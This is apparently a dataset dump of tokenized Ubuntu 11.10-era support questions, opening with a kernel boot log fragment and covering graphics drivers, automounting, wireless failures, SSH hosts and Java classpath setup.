00000000bf7980c0 00f20 ( v01 dpgpmm p001ist 00000011 intl 20060113 ) dec 5 09:08:51 www kernel : [ 0.520863 ] acpi : dynamic oem table load : dec 5 09:08:51 www kernel : [ 0.520990 ] acpi : ssdt ( null ) 00f20 ( v01 dpgpmm p001ist 00000011 intl 20060113 ) dec 5 09:08:51 www kernel : [ 0.521308 ] acpi : interpreter enabled dec 5 09:08:51 www kernel : [ 0.521366 ] acpi : ( supports s0 s1 s3 s4 s5 ) dec 5 09:08:51 www kernel : [ 0.521611 ] acpi : using ioapic for interrupt routing dec 5 09:08:51 www kernel : [ 0.522622 ] pci : mmconfig at [ mem 0xe0000000-0xefffffff ] reserved in acpi motherboard resources dec 5 09:08:51 www kernel : [ 0.554150 ] acpi : no dock devices found . dec 5 09:08:51 www kernel : [ 0.554267 ] pci : using host bridge windows from acpi ; if necessary , use `` pci=nocrs '' and report a bug dec 5 09:08:51 www kernel : [ 0.555231 ] acpi : pci root bridge [ pci0 ] ( domain 0000 [ bus 00-ff ] ) dec 5 09:08:51 www kernel : [ 0.588224 ] acpi : pci interrupt routing table [ \_sb_.pci0._prt ] dec 5 09:08:51 www kernel : [ 0.588398 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p1._prt ] dec 5 09:08:51 www kernel : [ 0.588451 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p4._prt ] dec 5 09:08:51 www kernel : [ 0.588473 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p6._prt ] dec 5 09:08:51 www kernel : [ 0.588492 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p7._prt ] dec 5 09:08:51 www kernel : [ 0.588512 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p8._prt ] dec 5 09:08:51 www kernel : [ 0.588540 ] acpi : pci interrupt routing table [ \_sb_.pci0.npe1._prt ] dec 5 09:08:51 www kernel : [ 0.588559 ] acpi : pci interrupt routing table [ \_sb_.pci0.npe3._prt ] dec 5 09:08:51 www kernel : [ 0.588579 ] acpi : pci interrupt routing table [ \_sb_.pci0.npe7._prt ] dec 5 09:08:51 www kernel : [ 0.588605 ] pci0000:00 : requesting acpi _osc control ( 0x1d ) dec 5 09:08:51 www kernel : [ 0.588667 ] pci0000:00 : acpi _osc request failed ( ae_not_found ) , returned control mask : 0x1d dec 5 09:08:51 www kernel : [ 0.588746 ] acpi _osc control for pcie not granted , disabling aspm dec 5 09:08:51 www kernel : [ 0.597666 ] acpi : pci interrupt link [ lnka ] ( irqs 3 4 6 7 10 11 12 14 *15 ) dec 5 09:08:51 www kernel : [ 0.598142 ] acpi : pci interrupt link [ lnkb ] ( irqs *5 ) dec 5 09:08:51 www kernel : [ 0.598336 ] acpi : pci interrupt link [ lnkc ] ( irqs 3 4 6 7 10 *11 12 14 15 ) dec 5 09:08:51 www kernel : [ 0.598810 ] acpi : pci interrupt link [ lnkd ] ( irqs 3 4 6 7 *10 11 12 14 15 ) dec 5 09:08:51 www kernel : [ 0.599284 ] acpi : pci interrupt link [ lnke ] ( irqs 3 4 6 7 10 11 12 *14 15 ) dec 5 09:08:51 www kernel : [ 0.599762 ] acpi : pci interrupt link [ lnkf ] ( irqs *3 4 6 7 10 11 12 14 15 ) dec 5 09:08:51 www kernel : [ 0.600236 ] acpi : pci interrupt link [ lnkg ] ( irqs 3 4 6 *7 10 11 12 14 15 ) dec 5 09:08:51 www kernel : [ 0.600709 ] acpi : pci interrupt link [ lnkh ] ( irqs 3 *4 6 7 10 11 12 14 15 ) dec 5 09:08:51 www kernel : [ 0.601931 ] pci : using acpi for irq routing dec 5 09:08:51 www kernel : [ 0.628146 ] pnp : pnp acpi init dec 5 09:08:51 www kernel : [ 0.628211 ] acpi : bus type pnp registered dec 5 09:08:51 www kernel : [ 0.628417 ] pnp 00:00 : plug and play acpi device , ids pnp0a08 pnp0a03 ( active ) dec 5 09:08:51 www kernel : [ 0.628859 ] system 00:01 : plug and play acpi device , ids pnp0c01 ( active ) dec 5 09:08:51 www kernel : [ 0.628915 ] pnp 00:02 : plug and play acpi device , ids pnp0200 ( active ) dec 5 09:08:51 www kernel : [ 0.628951 ] pnp 00:03 : plug and play acpi device , ids pnp0b00 ( active ) dec 5 09:08:51 www kernel : [ 0.628975 ] pnp 00:04 : plug and play acpi device , ids pnp0800 ( active ) dec 5 09:08:51 www kernel : [ 0.629004 ] pnp 00:05 : plug and play acpi device , ids pnp0c04 ( active ) dec 5 09:08:51 www kernel : [ 0.629229 ] system 00:06 : plug and play acpi device , ids pnp0c02 ( active ) dec 5 09:08:51 www kernel : [ 0.629779 ] system 00:07 : plug and play acpi device , ids pnp0c02 ( active ) dec 5 09:08:51 www kernel : [ 0.629849 ] pnp 00:08 : plug and play acpi device , ids pnp0103 ( active ) dec 5 09:08:51 www kernel : [ 0.629901 ] pnp 00:09 : plug and play acpi device , ids int0800 ( active ) dec 5 09:08:51 www kernel : [ 0.630030 ] system 00:0a : plug and play acpi device , ids pnp0c02 ( active ) dec 5 09:08:51 www kernel : [ 0.630254 ] system 00:0b : plug and play acpi device , ids pnp0c02 ( active ) dec 5 09:08:51 www kernel : [ 0.630304 ] pnp 00:0c : plug and play acpi device , ids pnp0303 pnp030b ( active ) dec 5 09:08:51 www kernel : [ 0.630359 ] pnp 00:0d : plug and play acpi device , ids pnp0f03 pnp0f13 ( active ) dec 5 09:08:51 www kernel : [ 0.630492 ] system 00:0e : plug and play acpi device , ids pnp0c02 ( active ) dec 5 09:08:51 www kernel : [ 0.630986 ] system 00:0f : plug and play acpi device , ids pnp0c01 ( active ) dec 5 09:08:51 www kernel : [ 0.631078 ] pnp : pnp acpi : found 16 devices dec 5 09:08:51 www kernel : [ 0.631135 ] acpi : acpi bus type pnp unregistered dec 5 09:08:51 www kernel : [ 0.726291 ] acpi : power button [ pwrb ] dec 5 09:08:51 www kernel : [ 0.726452 ] acpi : power button [ pwrf ] dec 5 09:08:51 www kernel : [ 0.726527 ] acpi : acpi_idle yielding to intel_idle dec 7 21:45:22 www kernel : [ 0.000000 ] bios-e820 : 00000000bf780000 - 00000000bf798000 ( acpi data ) dec 7 21:45:22 www kernel : [ 0.000000 ] bios-e820 : 00000000bf798000 - 00000000bf7dc000 ( acpi nvs ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : rsdp 00000000000fb1a0 00014 ( v00 acpiam ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : rsdt 00000000bf780000 00040 ( v01 022410 rsdt1405 20100224 msft 00000097 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : facp 00000000bf780200 00084 ( v01 022410 facp1405 20100224 msft 00000097 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : dsdt 00000000bf7804b0 0c359 ( v01 a1279 a1279001 00000001 intl 20060113 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : facs 00000000bf798000 00040 dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : apic 00000000bf780390 000d8 ( v01 022410 apic1405 20100224 msft 00000097 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : mcfg 00000000bf780470 0003c ( v01 022410 oemmcfg 20100224 msft 00000097 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : oemb 00000000bf798040 00072 ( v01 022410 oemb1405 20100224 msft 00000097 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : hpet 00000000bf78f4b0 00038 ( v01 022410 oemhpet 20100224 msft 00000097 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : osfr 00000000bf78f4f0 000b0 ( v01 022410 oemosfr 20100224 msft 00000097 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : ssdt 00000000bf798fe0 00363 ( v01 dpgpmm cpupm 00000012 intl 20060113 ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : local apic address 0xfee00000 dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : pm-timer io port : 0x808 dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : local apic address 0xfee00000 dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x01 ] lapic_id [ 0x00 ] enabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x02 ] lapic_id [ 0x02 ] enabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x03 ] lapic_id [ 0x04 ] enabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x04 ] lapic_id [ 0x06 ] enabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x05 ] lapic_id [ 0x84 ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x06 ] lapic_id [ 0x85 ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x07 ] lapic_id [ 0x86 ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x08 ] lapic_id [ 0x87 ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x09 ] lapic_id [ 0x88 ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0a ] lapic_id [ 0x89 ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0b ] lapic_id [ 0x8a ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0c ] lapic_id [ 0x8b ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0d ] lapic_id [ 0x8c ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0e ] lapic_id [ 0x8d ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0f ] lapic_id [ 0x8e ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x10 ] lapic_id [ 0x8f ] disabled ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : ioapic ( id [ 0x01 ] address [ 0xfec00000 ] gsi_base [ 0 ] ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : ioapic ( id [ 0x03 ] address [ 0xfec8a000 ] gsi_base [ 24 ] ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 0 global_irq 2 dfl dfl ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 9 global_irq 9 high level ) dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : irq0 used by override . dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : irq2 used by override . dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : irq9 used by override . dec 7 21:45:22 www kernel : [ 0.000000 ] using acpi ( madt ) for smp configuration information dec 7 21:45:22 www kernel : [ 0.000000 ] acpi : hpet id : 0x8086a301 base : 0xfed00000 dec 7 21:45:22 www kernel : [ 0.009505 ] acpi : core revision 20110413 dec 7 21:45:22 www kernel : [ 0.499203 ] pm : registering acpi nvs region at bf798000 ( 278528 bytes ) dec 7 21:45:22 www kernel : [ 0.500819 ] acpi : bus type pci registered dec 7 21:45:22 www kernel : [ 0.503121 ] acpi : ec : look up ec in dsdt dec 7 21:45:22 www kernel : [ 0.504162 ] acpi : executed 1 blocks of module-level executable aml code dec 7 21:45:22 www kernel : [ 0.520821 ] acpi : ssdt 00000000bf7980c0 00f20 ( v01 dpgpmm p001ist 00000011 intl 20060113 ) dec 7 21:45:22 www kernel : [ 0.521247 ] acpi : dynamic oem table load : dec 7 21:45:22 www kernel : [ 0.521374 ] acpi : ssdt ( null ) 00f20 ( v01 dpgpmm p001ist 00000011 intl 20060113 ) dec 7 21:45:22 www kernel : [ 0.521691 ] acpi : interpreter enabled dec 7 21:45:22 www kernel : [ 0.521748 ] acpi : ( supports s0 s1 s3 s4 s5 ) dec 7 21:45:22 www kernel : [ 0.521993 ] acpi : using ioapic for interrupt routing dec 7 21:45:22 www kernel : [ 0.523002 ] pci : mmconfig at [ mem 0xe0000000-0xefffffff ] reserved in acpi motherboard resources dec 7 21:45:22 www kernel : [ 0.554533 ] acpi : no dock devices found . dec 7 21:45:22 www kernel : [ 0.554649 ] pci : using host bridge windows from acpi ; if necessary , use `` pci=nocrs '' and report a bug dec 7 21:45:22 www kernel : [ 0.555620 ] acpi : pci root bridge [ pci0 ] ( domain 0000 [ bus 00-ff ] ) dec 7 21:45:22 www kernel : [ 0.588224 ] acpi : pci interrupt routing table [ \_sb_.pci0._prt ] dec 7 21:45:22 www kernel : [ 0.588398 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p1._prt ] dec 7 21:45:22 www kernel : [ 0.588451 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p4._prt ] dec 7 21:45:22 www kernel : [ 0.588473 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p6._prt ] dec 7 21:45:22 www kernel : [ 0.588492 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p7._prt ] dec 7 21:45:22 www kernel : [ 0.588512 ] acpi : pci interrupt routing table [ \_sb_.pci0.p0p8._prt ] dec 7 21:45:22 www kernel : [ 0.588540 ] acpi : pci interrupt routing table [ \_sb_.pci0.npe1._prt ] dec 7 21:45:22 www kernel : [ 0.588559 ] acpi : pci interrupt routing table [ \_sb_.pci0.npe3._prt ] dec 7 21:45:22 www kernel : [ 0.588579 ] acpi : pci interrupt routing table [ \_sb_.pci0.npe7._prt ] dec 7 21:45:22 www kernel : [ 0.588606 ] pci0000:00 : requesting acpi _osc control ( 0x1d ) dec 7 21:45:22 www kernel : [ 0.588667 ] pci0000:00 : acpi _osc request failed ( ae_not_found ) , returned control mask : 0x1d dec 7 21:45:22 www kernel : [ 0.588746 ] acpi _osc control for pcie not granted , disabling aspm dec 7 21:45:22 www kernel : [ 0.597661 ] acpi : pci interrupt link [ lnka ] ( irqs 3 4 6 7 10 11 12 14 *15 ) dec 7 21:45:22 www kernel : [ 0.598137 ] acpi : pci interrupt link [ lnkb ] ( irqs *5 ) dec 7 21:45:22 www kernel : [ 0.598331 ] acpi : pci interrupt link [ lnkc ] ( irqs 3 4 6 7 10 *11 12 14 15 ) dec 7 21:45:22 www kernel : [ 0.598804 ] acpi : pci interrupt link [ lnkd ] ( irqs 3 4 6 7 *10 11 12 14 15 ) dec 7 21:45:22 www kernel : [ 0.599278 ] acpi : pci interrupt link [ lnke ] ( irqs 3 4 6 7 10 11 12 *14 15 ) dec 7 21:45:22 www kernel : [ 0.599756 ] acpi : pci interrupt link [ lnkf ] ( irqs *3 4 6 7 10 11 12 14 15 ) dec 7 21:45:22 www kernel : [ 0.600230 ] acpi : pci interrupt link [ lnkg ] ( irqs 3 4 6 *7 10 11 12 14 15 ) dec 7 21:45:22 www kernel : [ 0.600704 ] acpi : pci interrupt link [ lnkh ] ( irqs 3 *4 6 7 10 11 12 14 15 ) dec 7 21:45:22 www kernel : [ 0.601926 ] pci : using acpi for irq routing dec 7 21:45:22 www kernel : [ 0.624115 ] pnp : pnp acpi init dec 7 21:45:22 www kernel : [ 0.624179 ] acpi : bus type pnp registered dec 7 21:45:22 www kernel : [ 0.624382 ] pnp 00:00 : plug and play acpi device , ids pnp0a08 pnp0a03 ( active ) dec 7 21:45:22 www kernel : [ 0.624821 ] system 00:01 : plug and play acpi device , ids pnp0c01 ( active ) dec 7 21:45:22 www kernel : [ 0.624875 ] pnp 00:02 : plug and play acpi device , ids pnp0200 ( active ) dec 7 21:45:22 www kernel : [ 0.624911 ] pnp 00:03 : plug and play acpi device , ids pnp0b00 ( active ) dec 7 21:45:22 www kernel : [ 0.624933 ] pnp 00:04 : plug and play acpi device , ids pnp0800 ( active ) dec 7 21:45:22 www kernel : [ 0.624962 ] pnp 00:05 : plug and play acpi device , ids pnp0c04 ( active ) dec 7 21:45:22 www kernel : [ 0.625186 ] system 00:06 : plug and play acpi device , ids pnp0c02 ( active ) dec 7 21:45:22 www kernel : [ 0.625733 ] system 00:07 : plug and play acpi device , ids pnp0c02 ( active ) dec 7 21:45:22 www kernel : [ 0.625803 ] pnp 00:08 : plug and play acpi device , ids pnp0103 ( active ) dec 7 21:45:22 www kernel : [ 0.625856 ] pnp 00:09 : plug and play acpi device , ids int0800 ( active ) dec 7 21:45:22 www kernel : [ 0.625984 ] system 00:0a : plug and play acpi device , ids pnp0c02 ( active ) dec 7 21:45:22 www kernel : [ 0.626206 ] system 00:0b : plug and play acpi device , ids pnp0c02 ( active ) dec 7 21:45:22 www kernel : [ 0.626256 ] pnp 00:0c : plug and play acpi device , ids pnp0303 pnp030b ( active ) dec 7 21:45:22 www kernel : [ 0.626312 ] pnp 00:0d : plug and play acpi device , ids pnp0f03 pnp0f13 ( active ) dec 7 21:45:22 www kernel : [ 0.626445 ] system 00:0e : plug and play acpi device , ids pnp0c02 ( active ) dec 7 21:45:22 www kernel : [ 0.626936 ] system 00:0f : plug and play acpi device , ids pnp0c01 ( active ) dec 7 21:45:22 www kernel : [ 0.627027 ] pnp : pnp acpi : found 16 devices dec 7 21:45:22 www kernel : [ 0.627084 ] acpi : acpi bus type pnp unregistered dec 7 21:45:22 www kernel : [ 0.722086 ] acpi : power button [ pwrb ] dec 7 21:45:22 www kernel : [ 0.722246 ] acpi : power button [ pwrf ] dec 7 21:45:22 www kernel : [ 0.722320 ] acpi : acpi_idle yielding to intel_idle
86502	re-enable `` popping '' sounds	i want to know why the `` popping '' sounds were disabled , the ones that sound when i changed the volume , very mac osx like . is it possible to re-enable them ? i 'm using ubuntu 11.10 and i loved those sounds by the way . regards
86506	hd videos are laggy with mobility hd 4250 in 11.10	i have an mobility hd 4250 graphics on my computer . im trying to watch hd videos 1080p from youtube , but when watching them , they are very laggy . i have proprietary drivers . i have disabled sync to vblank and detect freshrate from ccsm , and my ubuntu works fine with those settings , but hd video lag is the only problem with this . when i had windows , i was able to watch 1080p videos smoothly . possible to fix this ? i use chrome and i have installed flash when i installed 11.10 .
86520	how to automount a partition on login ?	i have my musics in another partition of the hd , and i would like that , on login , the partition to be auto-mounted , so i can just open the media player and listen to my music . is there a way ?
86527	high cpu when i open nautilus	everything else works fine but when i open my home folder or move stuff around in it my cpu gets really high and everything slows down . this started to happen after upgrading to 11.10 . everything in 11.04 worked fine . does anybody know why ? is there a solution to this ?
86529	how do i start a wine program from the command line ?	i would like to start a wine program via the terminal so if something goes wrong i can see what . what command should i type in to get the program started ? for an example lets say spotify .
86537	gnome shell and ati driver	i 've updated my open source ati driver to the closed source version . consequently my gnome shell stopped working as well as it used to work . it started to flash weirdly . i recorded short video to show it : http : //www.youtube.com/watch ? v=upewn7fi8qw before the driver update , the gnome shell worked fine . with new driver the unity works fine . i still prefer shell ( when it still worked correctly ) , so is there something i can do to fix this issue .
86541	how to fix `` disk drive for /boot/efi is not ready or not present '' ?	after i updated bios/uefi version to 1101 on an asus p8z68-v pro motherboard ubuntu ( 11.10 ) did not boot . after post all i saw was a black screen with a blinking cursor in the top left corner . i booted an ubuntu 11.10 live-cd and set the flag for the 20 mb partition before my boot partition to `` bios_grub '' . then i was able to boot and login . but now every time i boot and ubuntu loads i get the following message : disk drive for /boot/efi is not ready or not present . continue waiting or press s to skip or m for manual recovery . i am able to login if i choose to ignore it by pressing s , but what does this message mean ? how can i fix what the message warns about ? after logging in i have noticed that /boot/efi is empty . the following forum post speaks of the same issue ubuntuforums.org/showthread.php ? t=1893030 . updating to the latest bios/uefi - version 3203 , did not have any effect on this issue .
86544	how do i delete the entire history ( recently used items ) in the dash ?	i want to delete all the history of the unity dash about files , videos , text files , images , etc . i find it surprising that the best thing that activity log manager can do is to delete the history of one week only .
86546	gwt ( google web toolkit ) app through usc ( ubuntu software center )	is it possible do deploy google web toolkit ( gwt ) apps through the ubuntu software center ? i never deployed any application through the ubuntu software center ( newbie ) . so if yes , is there someone who can give me a short tutorial for handling this ? i have nice ideas to spread the world with innovative apps and want to use the usc for this ; )
86553	how to stop hdd from causing a kernel panic and crashing ?	i accidentally booted into the windows recovery partition which gave me an option to quit or continue to wipe the disk . i selected the option to quit but an onscreen message said initialising ( which i thought was odd , since i expected it to just reboot when i selected quit ) . after a few minutes i cut the power to prevent it from overriding my hdd . when i rebooted i got the grub rescue prompt but after using ls it turns out that every partition has msdos in the name , i..e hd0 , msdos1 . then i tried my liveusb but kept getting a kernel panic message saying out of memory ( i have 2g of ram so should n't be a problem ) . finally i decided to remove the hdd . now i can boot with my liveusb but whenever i connect the hdd ( using a sata enclosure ) it takes the entire os down . any idea how i can inspect the hdd without it freezing the os ? i 'm out of ideas ! with the hard drive removed and booting with a liveusb from an sd card i can load ubuntu but as soon as i connect the hard drive ( externally via usb using the enclosure ) it causes ubuntu to crash . it also causes the same effect on another machine that 's running fedora the cpu and/memory usage sky-rockets until the pc os becomes unresponsive ( even when the drive is removed ) . the logs are a good idea , i didnt check because i 'm using the liveusb with no persistent storage ( so the logs disappear when i hit the power button to reset the machine ) . however you gave me an idea and i 've checked the messages log on the fedora machine . the last entry says `` attached scsi disk '' which does n't give much away but just before that it lists sdb1 , sdb2 all the way through to sdb255 ... i 've not seen that before . so far its crashed both linux computers that i 've connected to . windows does not cause a crash and detects that the drive is connected but fails to mount it . a pc repair shop will be too expensive . there must be a way to stop linux from entering the continuous loop ( which is what i assume is using all of the memory ) when the hdd is plugged in ?
86554	system lockup in 11.10 afer installing nvidia-current , horrible/sluggish performance when using nvidia 173 drivers	i 've been trying to get this resolved for the last two days now ; i 've done a complete/clean reinstall of 11.10 ; i 've tried reinstalling and uninstalling the nvidia drivers multiple ways ( ie , using jockey , downloading from nvidia website , etc ) but nothing has worked . i get horrible performance from the 173 drivers ( slow gnome-shell operation/animations , slow web browsing , file browsing , etc ) . when i `` activate '' the nvidia-current drivers in jockey then reboot , i get great performance and everything runs smoothly , but the system goes into complete lockup after about a minute of use . everything on the display freezes/stops responding including the mouse and keyboard . i have a bit of terminal knowledge , so feel free to throw some code , etc , at me or tell me to retrieve/post log file outputs ... . my system is a gateway p-6860fx with a 1.8ghz dore2duo , 4 gigs of ddr2 ram and a nvidia 8800m gts ( 512mb version ) . the problem has been present both times i installed 11.10 on this machine . i have gotten 11.10 with gnome-shell running perfectly on my desktop which has a 3.3 ghz core2duo , 4 gigs of ram , and a nvidia gtx 460 .
86561	how can i increase the console resolution of my ubuntu server	i am running an ubuntu server inside vmware workstation , when i run the vm the screen is really small . i want to increase it to something that fits in the whole vmware console . i tried changing the gfx_mode in /etc/default/grub , then i ran update-grub2 . when i restarted it only made the grub menu huge . but once it booted into ubuntu compltely it shrunk back down to the default resolution . what am i missing ?
86565	ubuntu 11.10 loading into tty mode	i 'm sure that this has been asked before . i 'm not completely new to ubuntu , i started with 9.04 , but i stopped using it for a long time , and am currently dual-booting 11.10 alongside windows 7 on my laptop . i wanted to enable the compiz effects , but ubuntu was not recognizing my graphics card ( nvidia geforce 525m ) so i thought maybe updating the driver would help . i ctrl+alt+f1 entered tty mode , and i did the following : sudo service lightdm stop cd ~/downloads sudo sh ./nvidia-linux-x86_64-290.10.run and then i went through the setup for the nvidia driver . it said it installed correctly , so i restarted my laptop through ctrl+alt+delete , and then when i went to load ubuntu , it loaded in tty mode . i ca n't seem to figure out how to get back to the user interface for ubuntu . anyone who could help me out , it would be greatly appreciated .
86569	is there a way to determine if package depends on wine to run from its .deb ?	i would like to know if installed app will use wine server to run : for e.g . picasa once installed -- it uses wine to run , however i want to know that picasa will use wine before installing it . i 've tried dpkg -i but does n't show this particular info .
86578	hp mini 5102 running 11.10 extremely slow	i have an hp mini 5102 . i had been running 10.10 with no problems . when 11.04 came out , i upgraded but found that it was running extremely slow . i went back to 10.10 and things were fine . i recently decided to try out 11.10 because i really like the way it runs on my desktop . i am now running 11.10 on my netbook but it is also very slow . it runs as if i have a lot of movies playing in the background but i only have the browser open . here is my lspci output : 00:00.0 host bridge : intel corporation n10 family dmi bridge 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics > controller 00:02.1 display controller : intel corporation n10 family integrated graphics controller 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation n10/ich7 family sata ahci controller ( rev 02 ) 01:00.0 network controller : intel corporation centrino wireless-n 1000
86580	remastersys failed	so i was running remastsys to create my own ubuntu distro and i left while it was running . when i came back it was hibernating and when i tried to wake it up it would n't do anything it just stayed a black screen . i restarted and even after doing that whenever i run remastersys my screen goes black and wo n't respond . how do i fix it ?
86583	setting java classpath	i 've done java development before but generally on windows ( but i 'm by no means an expert ) . i just want to set my classpath . when i run : echo $ classpath ( is that right ) ? i get a empty line . so , it appears to me that my computer does not have a `` classpath '' setup . what is the best practice to setup the classpath in ubuntu ( and linux in general ) ? i 'm using the default java for ubuntu which should be openjdk . not sure it 's important , but i want to use rhino ( http : //en.wikipedia.org/wiki/rhino_ ( javascript_engine ) ) note : i 've been able to install rhino via the package manager . there is both documentation and rhnio packages . then , the commands are js and rhino-debugger
86586	accessing windows partition inside wubi	my hard disk crashed and i had to reinstall ubuntu . i dual booted it using wubi and i installed it in c : partition . when i boot into ubuntu , i ca n't see my partition ( the partition where windows is installed ) but i can see my second partition , d : . do i need to mount the partition ?
86587	how to find the added hosts address in ssh ?	i have setup-ed key based ssh authentication to all the systems . how ever i have missed out few systems . if i taken the address of the added hosts , i can find out the non added hosts address . is there any command to retreive the added hosts address ? thanks in advance . update output of awk ' { print $ 1 } ' ~/.ssh/known_hosts can be found here .
86589	wireless is dead on asus ul30vt laptop new install ubuntu 11.10	i have spent the past two days trying to figure out why the wireless on my asus ul30vt is not working . perhaps my completely uninstalling windows has something to do with it ? here are results of my diagnostics . thanks for all help , if i do n't resolve this issue i am practically tied to my cable box . uname -mr 3.0.0-13-generic x86_64 ndiswrapper -l netw5s64 : driver installed lshw -c network *-network unclaimed description : network controller product : ultimate n wifi link 5300 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : cap_list configuration : latency=0 resources : memory : feafe000-feafffff network controller [ 0280 ] : intel corporation ultimate n wifi link 5300 [ 8086:4235 ] lsmod | grep asusasus_laptop 19722 0 sparse_keymap 13890 1 asus_laptop modinfo asus_laptop filename : /lib/modules/3.0.0-13-generic/kernel/drivers/platform/x86/asus-laptop.ko license : gpl description : asus laptop support author : julien lerouge , karol kozimor , corentin chary srcversion : 47a5afed1b968c9ffeee47f alias : acpi* : atk0101 : * alias : acpi* : atk0100 : * depends : sparse-keymap vermagic : 3.0.0-13-generic smp mod_unload modversions parm : wapf : wapf value ( uint ) parm : wlan_status : set the wireless status on boot ( 0 = disabled , 1 = enabled , -1 = do n't do anything ) . default is 1 ( int ) parm : bluetooth_status : set the wireless status on boot ( 0 = disabled , 1 = enabled , -1 = do n't do anything ) . default is 1 ( int ) parm : wimax_status : set the wireless status on boot ( 0 = disabled , 1 = enabled , -1 = do n't do anything ) . default is 1 ( int ) parm : wwan_status : set the wireless status on boot ( 0 = disabled , 1 = enabled , -1 = do n't do anything ) . default is 1 ( int ) dmesg | grep iwl [ 11.356334 ] iwlagn : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 11.356339 ] iwlagn : copyright ( c ) 2003-2011 intel corporation [ 11.356469 ] iwlagn 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 11.356480 ] iwlagn 0000:03:00.0 : setting latency timer to 64 [ 11.356515 ] iwlagn 0000:03:00.0 : detected intel ( r ) ultimate n wifi link 5300 agn , rev=0x24 [ 11.379957 ] iwlagn 0000:03:00.0 : unsupported ( too old ) eeprom ver=0x114 < 0x11a calib=0x3 < 0x4 [ 11.388621 ] iwlagn 0000:03:00.0 : pci int a disabled [ 11.388639 ] iwlagn : probe of 0000:03:00.0 failed with error -22 [ 961.843426 ] iwl3945 : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux , in-tree : s [ 961.843431 ] iwl3945 : copyright ( c ) 2003-2011 intel corporation [ 1462.816151 ] modules linked in : iwl3945 iwl_legacy bnep rfcomm parport_pc ppdev dm_crypt nvidia ( p ) binfmt_misc snd_hda_codec_hdmi joydev mxm_wmi uvcvideo videodev v4l2_compat_ioctl32 snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi psmouse snd_rawmidi serio_raw btusb snd_seq_midi_event snd_seq bluetooth wmi snd_timer snd_seq_device iwlagn mac80211 snd asus_laptop cfg80211 sparse_keymap soundcore snd_page_alloc lp parport ahci libahci i915 atl1c drm_kms_helper drm i2c_algo_bit video lspci -v network controller : intel corporation 